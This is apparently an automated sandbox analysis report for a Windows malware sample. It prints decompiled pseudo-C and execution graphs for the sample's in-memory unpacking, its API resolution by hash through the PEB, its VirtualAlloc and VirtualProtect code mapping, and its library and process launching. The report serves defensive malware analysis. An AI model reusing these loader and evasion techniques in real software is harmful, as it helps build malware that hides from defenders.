                                                                                0x003d32a1
                                                                                0x00000000
                                                                                0x003d32a1
                                                                                0x003d3208
                                                                                0x003d320d
                                                                                0x003d32ab
                                                                                0x003d32b3
                                                                                0x003d32cb
                                                                                0x003d32cd
                                                                                0x003d32cd
                                                                                0x003d32e4
                                                                                0x003d32e6
                                                                                0x003d32ed
                                                                                0x003d32f0
                                                                                0x003d32f3
                                                                                0x00000000
                                                                                0x003d3213
                                                                                0x003d3218
                                                                                0x00000000
                                                                                0x003d321a
                                                                                0x003d3221
                                                                                0x003d3223
                                                                                0x003d30ba
                                                                                0x003d30ba
                                                                                0x00000000
                                                                                0x003d30ba
                                                                                0x003d30ba
                                                                                0x003d3218
                                                                                0x003d320d
                                                                                0x00000000
                                                                                0x003d322d
                                                                                0x003d322d
                                                                                0x003d3242
                                                                                0x00000000
                                                                                0x003d3242

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 003D3299
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291884694.00000000003D1000.00000020.00000001.sdmp, Offset: 003D0000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2291878567.00000000003D0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291914976.00000000003DD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291932650.00000000003DF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_3d0000_shellstyle.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: |.
                                                                                • API String ID: 1279760036-512043466
                                                                                • Opcode ID: 6a402d1dc2c34ac1f8b6517036569c13c1b1665e37eb32a91fc8e7e31e1e442e
                                                                                • Instruction ID: 8d2cfc07bb524ebc0ad3884990dba0c100eeb928aab28f4f26d1d9d0ba50a8ff
                                                                                • Opcode Fuzzy Hash: 6a402d1dc2c34ac1f8b6517036569c13c1b1665e37eb32a91fc8e7e31e1e442e
                                                                                • Instruction Fuzzy Hash: DD519F72A083068B871ADF68E48556ABBEAEBD4344F20481FF452CB751DB31DE498793
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D7080, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 580 3d7080-3d7092 call 3d34c0 583 3d70af-3d70c3 LoadLibraryW 580->583 584 3d7094-3d70aa call 3d3f00 call 3d3e60 580->584 586 3d70c5-3d70db call 3d3f00 call 3d3e60 583->586 587 3d70e0-3d70eb 583->587 584->583 586->587 594 3d70ed-3d7103 call 3d3f00 call 3d3e60 587->594 595 3d7108-3d7110 587->595 594->595
                                                                                C-Code - Quality: 75%
                                                                                			E003D7080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				intOrPtr _t17;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E003D34C0(__ecx);
				if( *0x3ddd1c == 0) {
					 *0x3ddd1c = E003D3E60(__ebx, E003D3F00(0x9bab0b12), 0xe4b28d97, _t31);
				}
				_t6 = LoadLibraryW(_t30);
				_t17 =  *0x3de548; // 0x5f7ee0
				 *(_t17 + 0x30 + _t28 * 4) = _t6;
				_t7 =  *0x3de494;
				if(_t7 == 0) {
					_t7 = E003D3E60(_t15, E003D3F00(0x9bab0b12), 0x7facde30, _t31);
					 *0x3de494 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x3ddf30;
				if(_t9 == 0) {
					_t9 = E003D3E60(_t15, E003D3F00(0x9bab0b12), 0x5010a54d, _t31);
					 *0x3ddf30 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}











                                                                                0x003d7080
                                                                                0x003d7082
                                                                                0x003d7089
                                                                                0x003d7092
                                                                                0x003d70aa
                                                                                0x003d70aa
                                                                                0x003d70b0
                                                                                0x003d70b2
                                                                                0x003d70b8
                                                                                0x003d70bc
                                                                                0x003d70c3
                                                                                0x003d70d6
                                                                                0x003d70db
                                                                                0x003d70db
                                                                                0x003d70e2
                                                                                0x003d70e4
                                                                                0x003d70eb
                                                                                0x003d70fe
                                                                                0x003d7103
                                                                                0x003d7103
                                                                                0x003d7110

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003D721D,003D68AC), ref: 003D70B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291884694.00000000003D1000.00000020.00000001.sdmp, Offset: 003D0000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2291878567.00000000003D0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291914976.00000000003DD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291932650.00000000003DF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_3d0000_shellstyle.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: ~_
                                                                                • API String ID: 1029625771-2925104257
                                                                                • Opcode ID: 2e19b078c2c342bca8a591fabcd0fd8faaa5ebafb389a9a51eedb7770369bf68
                                                                                • Instruction ID: 153696326862a82101098946a9805d2cfdb8b511f6c607aa0329d2a7a0d24b24
                                                                                • Opcode Fuzzy Hash: 2e19b078c2c342bca8a591fabcd0fd8faaa5ebafb389a9a51eedb7770369bf68
                                                                                • Instruction Fuzzy Hash: 21018F32B152100B9B17AF7ABC4062A3BAFDBD1748B10042FE015CF355EA30CD018782
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C0580, Relevance: 3.1, APIs: 2, Instructions: 127memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 603 2c0580-2c05be call 2c0ed0 606 2c05c0-2c05cf 603->606 607 2c05d2-2c05da 603->607 608 2c06e7-2c06ef 607->608 609 2c05e0-2c05e3 607->609 609->608 610 2c05e9-2c05eb 609->610 610->608 612 2c05f1-2c05fc 610->612 612->608 613 2c0602-2c0607 612->613 614 2c060d-2c0629 call 2c1140 RtlMoveMemory 613->614 615 2c06d8-2c06e4 613->615 618 2c062b-2c0630 614->618 619 2c0654-2c0659 614->619 620 2c0632-2c0641 618->620 621 2c0643-2c0652 618->621 622 2c066c-2c0678 619->622 623 2c065b-2c066a 619->623 624 2c0679-2c0699 call 2c1140 620->624 621->624 622->624 623->624 624->608 627 2c069b-2c06a3 VirtualProtect 624->627 628 2c06a5-2c06a8 627->628 629 2c06c6-2c06d5 627->629 628->608 630 2c06aa-2c06ad 628->630 630->608 631 2c06af-2c06b1 630->631 631->614 632 2c06b7-2c06c3 631->632
                                                                                APIs
                                                                                  • Part of subcall function 002C0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002C0F08
                                                                                  • Part of subcall function 002C0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002C0F3E
                                                                                  • Part of subcall function 002C0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002C0F7F
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 002C061B
                                                                                • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 002C069C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291846754.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2c0000_shellstyle.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 4043890290-0
                                                                                • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction ID: e7aceee913b671ac9269e987fb7ec8a8643bb78dae5775765d24aeafb4e90253
                                                                                • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction Fuzzy Hash: 2C3146B367434297E3249E69DCC6FABA3C8DBD1354F280A3EF915C2280D52ED578C265
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D5CE0, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 633 3d5ce0-3d5cec call 3d65e0 636 3d5cee-3d5d04 call 3d3f00 call 3d3e60 633->636 637 3d5d09-3d5d0d ExitProcess 633->637 636->637
                                                                                C-Code - Quality: 100%
                                                                                			_entry_() {
				void* _t5;
				void* _t9;

				E003D65E0();
				if( *0x3dddb8 == 0) {
					 *0x3dddb8 = E003D3E60(_t5, E003D3F00(0x9bab0b12), 0x89f3d704, _t9);
				}
				ExitProcess(0);
			}





                                                                                0x003d5ce0
                                                                                0x003d5cec
                                                                                0x003d5d04
                                                                                0x003d5d04
                                                                                0x003d5d0b

                                                                                APIs
                                                                                • ExitProcess.KERNELBASE(00000000), ref: 003D5D0B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291884694.00000000003D1000.00000020.00000001.sdmp, Offset: 003D0000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2291878567.00000000003D0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291914976.00000000003DD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291932650.00000000003DF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_3d0000_shellstyle.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: 572f623d5f6d5364f5ea0346317203a04e2914e7ca20649b02dfda944bba318f
                                                                                • Instruction ID: 8deaa21c2bb0402fbbb4a9746096973f1014a53011a2b5b383c7cf3d570c0895
                                                                                • Opcode Fuzzy Hash: 572f623d5f6d5364f5ea0346317203a04e2914e7ca20649b02dfda944bba318f
                                                                                • Instruction Fuzzy Hash: 50D0C92274520446DE47ABB5784676A26AF8FA0748F21441BE011CF396EE208D60A361
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C0AD0, Relevance: 2.7, APIs: 2, Instructions: 175memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 642 2c0ad0-2c0b31 call 2c0ed0 645 2c0b47-2c0b4d 642->645 646 2c0b33-2c0b42 642->646 648 2c0b5f-2c0b7b 645->648 649 2c0b4f-2c0b54 645->649 647 2c0d40 646->647 651 2c0b7d-2c0b8e 648->651 652 2c0b90 648->652 649->648 653 2c0b96-2c0b9c 651->653 652->653 655 2c0bae-2c0bca 653->655 656 2c0b9e-2c0ba3 653->656 658 2c0bcc-2c0bd4 655->658 659 2c0bd7-2c0c21 VirtualAlloc 655->659 656->655 658->659 663 2c0d1a-2c0d24 659->663 664 2c0c27-2c0c2e 659->664 663->647 665 2c0c44-2c0c4b 664->665 666 2c0c30-2c0c3f 664->666 667 2c0c5d-2c0c79 665->667 668 2c0c4d-2c0c52 665->668 666->647 670 2c0c7b-2c0c83 667->670 671 2c0c86-2c0c8d 667->671 668->667 670->671 672 2c0c9f-2c0cbb 671->672 673 2c0c8f-2c0c94 671->673 675 2c0cbd-2c0cc5 672->675 676 2c0cc8-2c0cfa VirtualAlloc 672->676 673->672 675->676 679 2c0d02-2c0d07 676->679 679->663 680 2c0d09-2c0d18 679->680 680->647
                                                                                APIs
                                                                                  • Part of subcall function 002C0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002C0F08
                                                                                  • Part of subcall function 002C0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002C0F3E
                                                                                  • Part of subcall function 002C0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002C0F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000), ref: 002C0BFF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291846754.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2c0000_shellstyle.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 1654584625-0
                                                                                • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction ID: a375209279ee581cf02c9be7e75595e6b022ce52a2e4c698603011ca47c0d044
                                                                                • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction Fuzzy Hash: 93511770640218ABDB20CF54CE86FEAB7B8EF54701F004299FA08B7190D7B85E85CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C0170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 002C0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002C0F08
                                                                                  • Part of subcall function 002C0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002C0F3E
                                                                                  • Part of subcall function 002C0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002C0F7F
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 002C02F6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291846754.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2c0000_shellstyle.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 223123264-0
                                                                                • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction ID: b7cc326818756039de1a8ea907545d8b065b1230561b3d46daf222ea2441602e
                                                                                • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction Fuzzy Hash: 805127B1910268EBDB20DF64DD89FDEB778EF88700F0045D9E509B7250DB746A858FA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 002C0010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291846754.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2c0000_shellstyle.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                                                • API String ID: 0-211638553
                                                                                • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction ID: b1fe56b0bd38fab7ddd767b8f4cc942db052af5ee4632606a2efa6211eea0775
                                                                                • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction Fuzzy Hash: 51313C38E511289BCB04DB98CD80AEDBBB5FF4C340B50802BD506737A4DB789986CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C06F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291846754.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2c0000_shellstyle.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction ID: cfb0802f95c1b030f74a0e1c4878bdd548287c7fc1eccc95d51fffd052e3a9e0
                                                                                • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction Fuzzy Hash: 7A5193B1A24341DBD720DE26C881F5BB3D89FD4794F04472DF958E7241E275D9248BA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C08F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291846754.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2c0000_shellstyle.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction ID: ad0a6c7288ecc2b68ecb95bafd094ac1c4f8c8fa4348c64acbc9c76f6b37a8ee
                                                                                • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction Fuzzy Hash: B74129B16343029BC314DE69CC86FABB2D9AFC4B50F084B3EF644D6241D675D5288BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: NlsLexicons0416.exe PID: 2908 Parent PID: 2208 NlsLexicons0416.exeCOMMON

                                                                                Execution Graph

                                                                                Execution Coverage:9.5%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:1171
                                                                                Total number of Limit Nodes:13

                                                                                Graph

                                                                                execution_graph 5818 3d0170 5819 3d01fb 5818->5819 5834 3d0ad0 5819->5834 5825 3d02c4 5871 3d06f0 5825->5871 5827 3d02d0 5888 3d08f0 5827->5888 5829 3d02dc 5906 3d0580 5829->5906 5831 3d02e8 5832 3d02ef VirtualFree 5831->5832 5833 3d02fb 5831->5833 5832->5833 5835 3d0b2f 5834->5835 5836 3d0bf0 VirtualAlloc 5835->5836 5837 3d02ab 5835->5837 5838 3d0c1c 5836->5838 5840 3d0d60 5837->5840 5838->5837 5839 3d0cdb VirtualAlloc 5838->5839 5839->5837 5841 3d0d94 5840->5841 5842 3d0da3 VirtualAlloc RtlMoveMemory 5841->5842 5843 3d02b8 5842->5843 5847 3d0ddb 5842->5847 5850 3d0400 GetCurrentProcess 5843->5850 5845 3d0e0d RtlMoveMemory 5845->5847 5846 3d0e3c VirtualAlloc 5846->5847 5847->5843 5847->5846 5848 3d0e91 RtlFillMemory 5847->5848 5849 3d0e6a RtlMoveMemory 5847->5849 5914 3d1140 lstrcpynW 5847->5914 5848->5843 5848->5847 5849->5843 5849->5847 5915 3d1140 lstrcpynW 5850->5915 5852 3d0459 NtQueryInformationProcess 5853 3d046f 5852->5853 5854 3d04c5 5852->5854 5856 3d0484 GetProcessHeap HeapFree 5853->5856 5857 3d0492 GetProcessHeap RtlAllocateHeap GetCurrentProcess NtQueryInformationProcess 5853->5857 5858 3d0575 5853->5858 5855 3d04e5 5854->5855 5921 3d1140 lstrcpynW 5854->5921 5916 3d1140 lstrcpynW 5855->5916 5856->5857 5857->5853 5857->5854 5861 3d04dc RtlMoveMemory 5861->5855 5862 3d04ef RtlMoveMemory 5917 3d1140 lstrcpynW 5862->5917 5864 3d0511 RtlMoveMemory 5918 3d1140 lstrcpynW 5864->5918 5866 3d0528 RtlMoveMemory 5919 3d1140 lstrcpynW 5866->5919 5868 3d053f RtlMoveMemory 5920 3d1140 lstrcpynW 5868->5920 5870 3d055a RtlMoveMemory 5870->5825 5872 3d0740 5871->5872 5874 3d0744 5872->5874 5922 3d0fb0 5872->5922 5874->5827 5875 3d0770 5875->5874 5878 3d07ff LoadLibraryA 5875->5878 5930 3d1140 lstrcpynW 5875->5930 5877 3d07b5 RtlMoveMemory 5877->5875 5879 3d08b9 5878->5879 5886 3d080f 5878->5886 5879->5827 5881 3d082d RtlMoveMemory 5881->5875 5881->5886 5882 3d0858 GetProcAddress 5882->5874 5882->5886 5884 3d0872 RtlMoveMemory 5933 3d1140 lstrcpynW 5884->5933 5886->5874 5886->5875 5886->5882 5887 3d0890 RtlMoveMemory 5886->5887 5931 3d1140 lstrcpynW 5886->5931 5932 3d1140 lstrcpynW 5886->5932 5887->5874 5887->5886 5889 3d0934 5888->5889 5890 3d0fb0 2 API calls 5889->5890 5891 3d0938 5889->5891 5892 3d0970 5890->5892 5891->5829 5892->5891 5936 3d1140 lstrcpynW 5892->5936 5894 3d09af RtlMoveMemory 5894->5891 5900 3d09c2 5894->5900 5897 3d09f6 RtlMoveMemory 5897->5900 5898 3d0a97 RtlMoveMemory 5899 3d0aac 5898->5899 5898->5900 5899->5829 5900->5891 5937 3d1140 lstrcpynW 5900->5937 5938 3d1140 lstrcpynW 5900->5938 5940 3d1140 lstrcpynW 5900->5940 5902 3d0a3e RtlMoveMemory 5902->5891 5903 3d0a57 5902->5903 5939 3d1140 lstrcpynW 5903->5939 5905 3d0a61 RtlMoveMemory 5905->5900 5907 3d05bc 5906->5907 5908 3d05c0 5907->5908 5912 3d069b VirtualProtect 5907->5912 5941 3d1140 lstrcpynW 5907->5941 5942 3d1140 lstrcpynW 5907->5942 5908->5831 5910 3d0617 RtlMoveMemory 5910->5907 5912->5907 5913 3d06c6 5912->5913 5913->5831 5914->5845 5915->5852 5916->5862 5917->5864 5918->5866 5919->5868 5920->5870 5921->5861 5924 3d0fda 5922->5924 5923 3d104a 5923->5875 5924->5923 5934 3d1140 lstrcpynW 5924->5934 5926 3d1001 5935 3d1140 lstrcpynW 5926->5935 5928 3d101b RtlMoveMemory 5929 3d1029 5928->5929 5929->5875 5930->5877 5931->5881 5932->5884 5933->5886 5934->5926 5935->5928 5936->5894 5937->5897 5938->5902 5939->5905 5940->5898 5941->5910 5942->5907 5996 3e4b70 5997 3e4b98 5996->5997 5998 3e4b82 5996->5998 6001 3e4bd7 CreateProcessW 5997->6001 6003 3e3f00 GetPEB 5997->6003 5999 3e3f00 GetPEB 5998->5999 6000 3e4b8c 5999->6000 6002 3e3e60 GetPEB 6000->6002 6004 3e4c73 6001->6004 6007 3e4bf7 6001->6007 6002->5997 6005 3e4bc6 6003->6005 6008 3e3e60 GetPEB 6005->6008 6006 3e4bff 6007->6006 6009 3e4c33 6007->6009 6011 3e3f00 GetPEB 6007->6011 6010 3e4bd2 6008->6010 6013 3e4c5d 6009->6013 6015 3e3f00 GetPEB 6009->6015 6010->6001 6012 3e4c27 6011->6012 6014 3e3e60 GetPEB 6012->6014 6014->6009 6016 3e4c51 6015->6016 6017 3e3e60 GetPEB 6016->6017 6017->6013 6892 3e64b0 6893 3e64ba 6892->6893 6894 3e64d0 6892->6894 6895 3e3f00 GetPEB 6893->6895 6898 3e659a 6894->6898 6899 3e42c0 GetPEB 6894->6899 6896 3e64c4 6895->6896 6897 3e3e60 GetPEB 6896->6897 6897->6894 6900 3e657b 6899->6900 6900->6898 6902 3e4160 6900->6902 6903 3e4172 6902->6903 6907 3e4180 6902->6907 6904 3e3f00 GetPEB 6903->6904 6905 3e4177 6904->6905 6906 3e3e60 GetPEB 6905->6906 6906->6907 6907->6898 6914 3e7fb0 6915 3e34c0 GetPEB 6914->6915 6916 3e7fc2 6915->6916 6917 3e7fe3 6916->6917 6918 3e3f00 GetPEB 6916->6918 6920 3e8029 6917->6920 6922 3e3f00 GetPEB 6917->6922 6919 3e7fd7 6918->6919 6921 3e3e60 GetPEB 6919->6921 6925 3e3f00 GetPEB 6920->6925 6926 3e8051 6920->6926 6921->6917 6923 3e801d 6922->6923 6924 3e3e60 GetPEB 6923->6924 6924->6920 6927 3e8045 6925->6927 6928 3e807d 6926->6928 6930 3e3f00 GetPEB 6926->6930 6929 3e3e60 GetPEB 6927->6929 6929->6926 6931 3e8071 6930->6931 6932 3e3e60 GetPEB 6931->6932 6932->6928 6933 3e78b0 6943 3e7990 6933->6943 6934 3e7c1e 6936 3e7c3d 6934->6936 6938 3e3f00 GetPEB 6934->6938 6935 3e34c0 GetPEB 6935->6943 6937 3e7c05 6939 3e7c31 6938->6939 6940 3e3e60 GetPEB 6939->6940 6940->6936 6941 3e3f00 GetPEB 6941->6943 6942 3e3e60 GetPEB 6942->6943 6943->6934 6943->6935 6943->6937 6943->6941 6943->6942 7111 3e4df0 GetPEB 6944 3e1928 6954 3e191f 6944->6954 6945 3e1bc6 6946 3e35c0 GetPEB 6945->6946 6948 3e1bd0 6946->6948 6947 3e1ba4 6949 3e1bf1 6948->6949 6950 3e3f00 GetPEB 6948->6950 6956 3e3f00 GetPEB 6949->6956 6960 3e1c23 6949->6960 6952 3e1be5 6950->6952 6951 3e3f00 GetPEB 6951->6954 6955 3e3e60 GetPEB 6952->6955 6953 3e4e30 GetPEB 6953->6954 6954->6945 6954->6947 6954->6951 6954->6953 6964 3e35c0 GetPEB 6954->6964 6965 3e3e60 GetPEB 6954->6965 6955->6949 6957 3e1c17 6956->6957 6958 3e3e60 GetPEB 6957->6958 6958->6960 6959 3e1c4b 6960->6959 6961 3e3f00 GetPEB 6960->6961 6962 3e1c3f 6961->6962 6963 3e3e60 GetPEB 6962->6963 6963->6959 6964->6954 6965->6954 7112 3e4869 7117 3e4870 7112->7117 7113 3e496e 7115 3e492c 7113->7115 7116 3e3f00 GetPEB 7113->7116 7114 3e3f00 GetPEB 7114->7117 7118 3e4981 7116->7118 7117->7113 7117->7114 7117->7115 7120 3e3e60 GetPEB 7117->7120 7119 3e3e60 GetPEB 7118->7119 7119->7115 7120->7117 5943 3e30a0 5944 3e30ba 5943->5944 5945 3e3238 5944->5945 5946 3e32ab 5944->5946 5949 3e3291 RtlAllocateHeap 5944->5949 5950 3e3f00 GetPEB 5944->5950 5952 3e3e60 GetPEB 5944->5952 5946->5945 5953 3e3f00 GetPEB 5946->5953 5949->5944 5949->5945 5950->5944 5952->5944 5954 3e32bf 5953->5954 5955 3e3e60 5954->5955 5956 3e3ebc 5955->5956 5957 3e3e9c 5955->5957 5956->5945 5957->5956 5958 3e3f00 GetPEB 5957->5958 5961 3e40f5 5957->5961 5959 3e40e9 5958->5959 5960 3e3e60 GetPEB 5959->5960 5960->5961 5962 3e3f00 GetPEB 5961->5962 5968 3e4126 5961->5968 5964 3e411a 5962->5964 5963 3e3e60 GetPEB 5966 3e4157 5963->5966 5967 3e3e60 GetPEB 5964->5967 5965 3e4138 5965->5945 5966->5945 5967->5968 5968->5963 5968->5965 6018 3e5ce0 6026 3e65e0 6018->6026 6020 3e5ce5 6021 3e5d09 ExitProcess 6020->6021 6022 3e3f00 GetPEB 6020->6022 6023 3e5cf8 6022->6023 6024 3e3e60 GetPEB 6023->6024 6025 3e5d04 6024->6025 6025->6021 6070 3e65fd 6026->6070 6028 3e6dcd 6345 3eb2e0 6028->6345 6031 3e706e 6370 3e8740 6031->6370 6033 3e68df 6033->6020 6038 3e7061 6361 3e8d40 6038->6361 6043 3e3f00 GetPEB 6043->6070 6044 3e7073 6044->6020 6047 3e6f27 GetTickCount 6047->6070 6051 3e4220 GetPEB 6051->6070 6052 3e7066 6052->6020 6058 3e3f00 GetPEB 6059 3e6927 6058->6059 6059->6047 6059->6058 6064 3e6975 GetTickCount 6059->6064 6067 3e3e60 GetPEB 6059->6067 6063 3e3e60 GetPEB 6063->6070 6064->6070 6067->6059 6070->6028 6070->6031 6070->6033 6070->6038 6070->6043 6070->6051 6070->6059 6070->6063 6071 3e4160 GetPEB 6070->6071 6072 3e8400 6070->6072 6078 3e7120 6070->6078 6099 3e8e80 6070->6099 6109 3e8970 6070->6109 6121 3e80a0 6070->6121 6135 3e9860 6070->6135 6151 3e9620 6070->6151 6160 3e12b0 6070->6160 6182 3eafe0 6070->6182 6187 3e8700 6070->6187 6193 3e6060 6070->6193 6214 3eb430 6070->6214 6221 3e9f30 6070->6221 6230 3e61e0 6070->6230 6242 3e94d0 6070->6242 6249 3e3310 6070->6249 6259 3e1840 6070->6259 6274 3e3460 6070->6274 6284 3e53d0 6070->6284 6289 3e9270 6070->6289 6299 3e8bb0 6070->6299 6309 3e72d0 6070->6309 6319 3e9050 6070->6319 6333 3e4770 6070->6333 6350 3eb1d0 6070->6350 6355 3e7410 6070->6355 6071->6070 6075 3e84e3 6072->6075 6073 3e85bd 6073->6070 6074 3e8600 CreateFileW 6074->6073 6074->6075 6075->6073 6075->6074 6076 3e3f00 GetPEB 6075->6076 6077 3e3e60 GetPEB 6075->6077 6076->6075 6077->6075 6079 3e7125 6078->6079 6080 3e7233 6079->6080 6082 3e7232 6079->6082 6083 3e7080 GetPEB LoadLibraryW 6079->6083 6388 3e34c0 6080->6388 6082->6070 6083->6079 6085 3e7265 LoadLibraryW 6087 3e727a 